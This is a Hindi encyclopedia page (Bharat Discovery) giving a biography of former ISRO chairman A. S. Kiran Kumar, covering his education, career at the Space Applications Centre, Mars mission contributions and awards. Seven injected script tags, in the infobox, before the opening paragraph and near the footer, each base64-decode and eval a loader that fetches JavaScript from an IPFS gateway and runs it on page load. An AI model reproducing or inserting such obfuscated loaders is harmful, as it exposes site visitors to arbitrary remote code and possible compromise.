ए. एस. किरण कुमार

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
ए. एस. किरण कुमार
अलूरु सीलिन किरण कुमार
पूरा नाम अलूरु सीलिन किरण कुमार
जन्म 22 अक्टूबर, 1952
जन्म भूमि अलूर, कर्नाटक (भूतपूर्व मैसूर राज्य)
कर्म भूमि भारत
कर्म-क्षेत्र भारतीय अंतरिक्ष कार्यक्रम
शिक्षा एम. टेक, भौतिक इंजीनियरिंग
विद्यालय बैंगलोर विश्वविद्यालय
पुरस्कार-उपाधि पद्म श्री (2014)
प्रसिद्धि वैज्ञानिक
नागरिकता भारतीय
अन्य जानकारी ए. एस. किरण कुमार इसरो में चार दशकों से अधिक के विशिष्ट कॅरियर के साथ उपग्रह पेलोड और एप्लिकेशन डोमेन में एक अत्यधिक कुशल अंतरिक्ष वैज्ञानिक और इंजीनियर हैं।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>अलूरु सीलिन किरण कुमार (अंग्रेज़ी: Aluru Seelin Kiran Kumar, जन्म- 22 अक्टूबर, 1952) भारत के प्रसिद्ध वैज्ञानिक हैं। वे 'भारतीय अंतरिक्ष अनुसंधान संगठन' (इसरो) के 9वें अध्यक्ष रहे हैं। 14 जनवरी 2015 को उन्होंने इसरो के अध्यक्ष का पदभार ग्रहण किया था। इससे पू्र्व वे अंतरिक्ष अनुप्रयोग केंद्र, अहमदाबाद के निदेशक थे। राष्ट्र ने उन्हें 2014 में पद्म श्री से सम्मानित किया था। ए. एस. किरण कुमार के बाद के. सिवन इसरो अध्यक्ष बने हैं।

परिचय

अलूर सीलिन किरण कुमार नेशनल कॉलेज, बैंगलोर के प्रतिष्ठित शैक्षणिक संस्थान के पूर्व छात्र हैं। उन्होंने 1971 में बैंगलोर विश्वविद्यालय से भौतिकी में ऑनर्स की डिग्री प्राप्त की और बाद में 1973 में उसी विश्वविद्यालय से इलेक्ट्रॉनिक्स में मास्टर डिग्री प्राप्त की। इसके बाद उन्होंने 1975 में भारतीय विज्ञान संस्थान, बैंगलोर से भौतिक इंजीनियरिंग में एम. टेक की डिग्री ली।

कॅरियर

ए. एस. किरण कुमार ने 1975 में सैक में शामिल होकर इसरो में अपना कॅरियर शुरू किया। बाद में वे इस केंद्र में एसोसिएट निदेशक बने और मार्च 2012 में निदेशक के रूप में कार्यभार संभाला। किरण कुमार इसरो में चार दशकों से अधिक के विशिष्ट कॅरियर के साथ उपग्रह पेलोड और एप्लिकेशन डोमेन में एक अत्यधिक कुशल अंतरिक्ष वैज्ञानिक और इंजीनियर हैं। सैक में रहते हुए किरण कुमार पेलोड के डिजाइन, विकास और प्राप्ति और पृथ्वी अवलोकन, संचार, नेविगेशन के अनुप्रयोग गतिविधियों का संचालन कर रहे हैं।

योगदान

ए. एस. किरण कुमार ने अंतरिक्ष विज्ञान और ग्रहों की खोज, भास्कर टीवी पेलोड से लेकर नवीनतम मार्स कलर कैमरा, थर्मल इन्फ्रारेड इमेजिंग स्पेक्ट्रोमीटर और भारत के मंगल उपकरणों के लिए मीथेन सेंसर के लिए एयरबोर्न, लो अर्थ ऑर्बिट और जियोस्टेशनरी ऑर्बिट उपग्रहों के लिए इलेक्ट्रो-ऑप्टिकल इमेजिंग सेंसर के डिजाइन और विकास में अपार योगदान दिया है। मार्स ऑर्बिटर स्पेसक्राफ्ट, जिसने हाल ही में मार्स ऑर्बिट में छह महीने सफलतापूर्वक पूरे किए हैं, किरण कुमार ने मार्स ऑर्बिटर स्पेसक्राफ्ट को मंगल ग्रह की ओर ले जाने के साथ-साथ इसे मार्स ऑर्बिट में इंसर्शन करने की सफल रणनीति विकसित करने में महत्वपूर्ण भूमिका निभाई थी।

पुरस्कार

ए. एस. किरण कुमार कई राष्ट्रीय और अंतर्राष्ट्रीय पुरस्कारों के प्राप्तकर्ता हैं। राष्ट्र ने उन्हें 2014 में पद्म श्री से सम्मानित किया था। भारतीय मौसम विज्ञान सोसायटी के अलावा वह इंटरनेशनल एकेडमी ऑफ एस्ट्रोनॉटिक्स के सदस्य हैं। ए. एस. किरण कुमार ने विश्व मौसम विज्ञान संगठन (डब्ल्यूएमओ), पृथ्वी अवलोकन उपग्रहों की समिति (सीईओएस) और नागरिक अंतरिक्ष सहयोग पर भारत-अमेरिका संयुक्त कार्य समूह जैसे अंतर्राष्ट्रीय मंचों में इसरो का प्रतिनिधित्व किया है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>